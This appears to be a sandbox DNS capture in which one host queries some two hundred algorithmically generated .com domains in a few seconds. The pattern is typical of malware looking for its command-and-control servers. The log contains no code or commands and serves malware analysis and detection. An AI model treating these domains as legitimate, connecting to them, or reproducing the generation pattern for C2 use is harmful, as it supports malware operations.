                                                                                                                                                                                                              Nov 11, 2024 18:33:33.085663080 CET192.168.2.81.1.1.10x2a05Standard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.085892916 CET192.168.2.81.1.1.10x9713Standard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.085953951 CET192.168.2.81.1.1.10x9506Standard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.086363077 CET192.168.2.81.1.1.10x1a03Standard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.087826014 CET192.168.2.81.1.1.10x29c0Standard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.088650942 CET192.168.2.81.1.1.10x796dStandard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.088948011 CET192.168.2.81.1.1.10x3e77Standard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.089148998 CET192.168.2.81.1.1.10xd404Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.092679024 CET192.168.2.81.1.1.10x22c5Standard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.093070030 CET192.168.2.81.1.1.10x4548Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.093070030 CET192.168.2.81.1.1.10xc1a1Standard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.094295979 CET192.168.2.81.1.1.10xa0deStandard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.094485998 CET192.168.2.81.1.1.10xae3aStandard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.856924057 CET192.168.2.81.1.1.10x1501Standard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.857911110 CET192.168.2.81.1.1.10x7a9Standard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.859260082 CET192.168.2.81.1.1.10x4b5eStandard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.863750935 CET192.168.2.81.1.1.10xc7caStandard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.864123106 CET192.168.2.81.1.1.10xaad2Standard query (0)gaqykoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.867522955 CET192.168.2.81.1.1.10x4298Standard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.882155895 CET192.168.2.81.1.1.10x93d3Standard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.901665926 CET192.168.2.81.1.1.10xdce0Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.904057980 CET192.168.2.81.1.1.10x51f5Standard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.907165051 CET192.168.2.81.1.1.10x95f5Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.907552004 CET192.168.2.81.1.1.10xb3d6Standard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.909162045 CET192.168.2.81.1.1.10xc843Standard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.909432888 CET192.168.2.81.1.1.10xd014Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.910430908 CET192.168.2.81.1.1.10xa3d8Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.911210060 CET192.168.2.81.1.1.10x1cc1Standard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.911531925 CET192.168.2.81.1.1.10x363Standard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.912688971 CET192.168.2.81.1.1.10xc8a3Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.914535046 CET192.168.2.81.1.1.10xd27Standard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.915465117 CET192.168.2.81.1.1.10x434dStandard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.916100979 CET192.168.2.81.1.1.10x59e8Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.917746067 CET192.168.2.81.1.1.10x655dStandard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.918034077 CET192.168.2.81.1.1.10x200Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.926871061 CET192.168.2.81.1.1.10x6d59Standard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.927042961 CET192.168.2.81.1.1.10x1caaStandard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.927217007 CET192.168.2.81.1.1.10x56a1Standard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.927361965 CET192.168.2.81.1.1.10xa42aStandard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.927596092 CET192.168.2.81.1.1.10x7d82Standard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.927778959 CET192.168.2.81.1.1.10x76c9Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.928956032 CET192.168.2.81.1.1.10xaf8aStandard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.929277897 CET192.168.2.81.1.1.10xb3d4Standard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.929327965 CET192.168.2.81.1.1.10xf78aStandard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.934221029 CET192.168.2.81.1.1.10x392bStandard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.935019970 CET192.168.2.81.1.1.10x55e3Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.939933062 CET192.168.2.81.1.1.10x31f7Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.941317081 CET192.168.2.81.1.1.10x7a2fStandard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.946439028 CET192.168.2.81.1.1.10x7a03Standard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.947829008 CET192.168.2.81.1.1.10x769cStandard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.948189974 CET192.168.2.81.1.1.10x282Standard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.948662043 CET192.168.2.81.1.1.10x8e8Standard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.948955059 CET192.168.2.81.1.1.10x42bfStandard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.949220896 CET192.168.2.81.1.1.10x82fbStandard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.951946020 CET192.168.2.81.1.1.10x840dStandard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.952363968 CET192.168.2.81.1.1.10xa1e1Standard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.952552080 CET192.168.2.81.1.1.10xad21Standard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.952783108 CET192.168.2.81.1.1.10x95c9Standard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.952997923 CET192.168.2.81.1.1.10xb09bStandard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.953135014 CET192.168.2.81.1.1.10xdb04Standard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.953270912 CET192.168.2.81.1.1.10xab8fStandard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.953418970 CET192.168.2.81.1.1.10x9e99Standard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.953524113 CET192.168.2.81.1.1.10x46aaStandard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.953578949 CET192.168.2.81.1.1.10xbaa6Standard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.954708099 CET192.168.2.81.1.1.10x56a2Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.954905033 CET192.168.2.81.1.1.10x2272Standard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.955053091 CET192.168.2.81.1.1.10xdc9dStandard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.955296993 CET192.168.2.81.1.1.10xe9bbStandard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.955332994 CET192.168.2.81.1.1.10x98d8Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.956062078 CET192.168.2.81.1.1.10x3c1cStandard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.956232071 CET192.168.2.81.1.1.10xbf85Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.956727028 CET192.168.2.81.1.1.10x62abStandard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.974690914 CET192.168.2.81.1.1.10xdcf2Standard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.978383064 CET192.168.2.81.1.1.10xa314Standard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.985183001 CET192.168.2.81.1.1.10x6de6Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.986274958 CET192.168.2.81.1.1.10xd08Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.006218910 CET192.168.2.81.1.1.10x29cStandard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.007549047 CET192.168.2.81.1.1.10xe387Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.007755995 CET192.168.2.81.1.1.10x2db1Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.007921934 CET192.168.2.81.1.1.10xdda5Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.008090973 CET192.168.2.81.1.1.10x74eStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.008331060 CET192.168.2.81.1.1.10x68dfStandard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.008493900 CET192.168.2.81.1.1.10x440fStandard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.008635998 CET192.168.2.81.1.1.10xdfb3Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.008791924 CET192.168.2.81.1.1.10xd797Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.008929014 CET192.168.2.81.1.1.10x8c0Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.009193897 CET192.168.2.81.1.1.10xba34Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.009409904 CET192.168.2.81.1.1.10xa342Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.009593964 CET192.168.2.81.1.1.10x743dStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.009803057 CET192.168.2.81.1.1.10x5516Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.033261061 CET192.168.2.81.1.1.10x75eaStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.034338951 CET192.168.2.81.1.1.10x5ff1Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.034502983 CET192.168.2.81.1.1.10xfb33Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.034682035 CET192.168.2.81.1.1.10x6b5eStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.034936905 CET192.168.2.81.1.1.10x3f13Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.035161972 CET192.168.2.81.1.1.10xe654Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.035348892 CET192.168.2.81.1.1.10x5973Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.035506010 CET192.168.2.81.1.1.10xe156Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.036102057 CET192.168.2.81.1.1.10xf3b2Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.038938046 CET192.168.2.81.1.1.10xa8e8Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.038950920 CET192.168.2.81.1.1.10xae2eStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.039767981 CET192.168.2.81.1.1.10x6cd0Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.046035051 CET192.168.2.81.1.1.10x3d1bStandard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.047321081 CET192.168.2.81.1.1.10x1626Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.047528982 CET192.168.2.81.1.1.10xbb2Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.047636986 CET192.168.2.81.1.1.10xfd69Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.047800064 CET192.168.2.81.1.1.10x3058Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.047894001 CET192.168.2.81.1.1.10x4c00Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.048413992 CET192.168.2.81.1.1.10xb8e1Standard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.052700043 CET192.168.2.81.1.1.10x956Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.052700043 CET192.168.2.81.1.1.10xfb40Standard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.053261042 CET192.168.2.81.1.1.10x23ddStandard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.054250956 CET192.168.2.81.1.1.10x7e4Standard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.074174881 CET192.168.2.81.1.1.10xa3aeStandard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.074873924 CET192.168.2.81.1.1.10x2b81Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.075162888 CET192.168.2.81.1.1.10x2d54Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.075664997 CET192.168.2.81.1.1.10xb289Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.075885057 CET192.168.2.81.1.1.10xa451Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.076371908 CET192.168.2.81.1.1.10xc60cStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.076570988 CET192.168.2.81.1.1.10xaf4Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.078912973 CET192.168.2.81.1.1.10xfc28Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.080293894 CET192.168.2.81.1.1.10xea8aStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.080456018 CET192.168.2.81.1.1.10x8711Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.104707956 CET192.168.2.81.1.1.10xb7b4Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.105015039 CET192.168.2.81.1.1.10x991cStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.105192900 CET192.168.2.81.1.1.10xf106Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.109411955 CET192.168.2.81.1.1.10x74b6Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.109787941 CET192.168.2.81.1.1.10x626aStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.110029936 CET192.168.2.81.1.1.10xc934Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.110029936 CET192.168.2.81.1.1.10x98a8Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.110415936 CET192.168.2.81.1.1.10x88d8Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.110704899 CET192.168.2.81.1.1.10x6606Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.034157038 CET192.168.2.81.1.1.10xecb8Standard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.034915924 CET192.168.2.81.1.1.10xb73fStandard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.035305023 CET192.168.2.81.1.1.10xc136Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.041966915 CET192.168.2.81.1.1.10x60f9Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.047557116 CET192.168.2.81.1.1.10xcbdcStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.048196077 CET192.168.2.81.1.1.10x1540Standard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.055584908 CET192.168.2.81.1.1.10xa45fStandard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.077934980 CET192.168.2.81.1.1.10x6f14Standard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.080615997 CET192.168.2.81.1.1.10x76dStandard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.091747046 CET192.168.2.81.1.1.10xc0e9Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.096359968 CET192.168.2.81.1.1.10x5c62Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.110079050 CET192.168.2.81.1.1.10x3c18Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.118285894 CET192.168.2.81.1.1.10x3803Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.121654034 CET192.168.2.81.1.1.10xc024Standard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.122735023 CET192.168.2.81.1.1.10x6eaaStandard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.125637054 CET192.168.2.81.1.1.10xe58cStandard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.134126902 CET192.168.2.81.1.1.10xda05Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.139064074 CET192.168.2.81.1.1.10x4cefStandard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.139666080 CET192.168.2.81.1.1.10x907Standard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.140397072 CET192.168.2.81.1.1.10x27a3Standard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.144015074 CET192.168.2.81.1.1.10x7920Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.144876957 CET192.168.2.81.1.1.10x4491Standard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.163966894 CET192.168.2.81.1.1.10x6224Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.165869951 CET192.168.2.81.1.1.10x1cacStandard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.166635990 CET192.168.2.81.1.1.10x3e98Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.168634892 CET192.168.2.81.1.1.10xc388Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.170103073 CET192.168.2.81.1.1.10x3c33Standard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.171981096 CET192.168.2.81.1.1.10x81e6Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.179979086 CET192.168.2.81.1.1.10x497Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.180309057 CET192.168.2.81.1.1.10xba5dStandard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.180941105 CET192.168.2.81.1.1.10x78cfStandard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.181104898 CET192.168.2.81.1.1.10x3da4Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.181590080 CET192.168.2.81.1.1.10x8d63Standard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.181862116 CET192.168.2.81.1.1.10xa7f8Standard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.182240009 CET192.168.2.81.1.1.10xa618Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.182789087 CET192.168.2.81.1.1.10x5ef2Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.182967901 CET192.168.2.81.1.1.10x996fStandard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.187063932 CET192.168.2.81.1.1.10xb88bStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.194196939 CET192.168.2.81.1.1.10xef15Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.194384098 CET192.168.2.81.1.1.10x9cb1Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.194643021 CET192.168.2.81.1.1.10x4af4Standard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.196255922 CET192.168.2.81.1.1.10x29c1Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.196443081 CET192.168.2.81.1.1.10x44cfStandard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.196665049 CET192.168.2.81.1.1.10x1125Standard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.196824074 CET192.168.2.81.1.1.10x6c6aStandard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.197339058 CET192.168.2.81.1.1.10x3137Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.199991941 CET192.168.2.81.1.1.10x15d1Standard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200160027 CET192.168.2.81.1.1.10x3d3cStandard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200331926 CET192.168.2.81.1.1.10x772bStandard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200562000 CET192.168.2.81.1.1.10xd7e9Standard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200715065 CET192.168.2.81.1.1.10x9807Standard query (0)gadyveb.comA (IP address)IN (0x0001)false
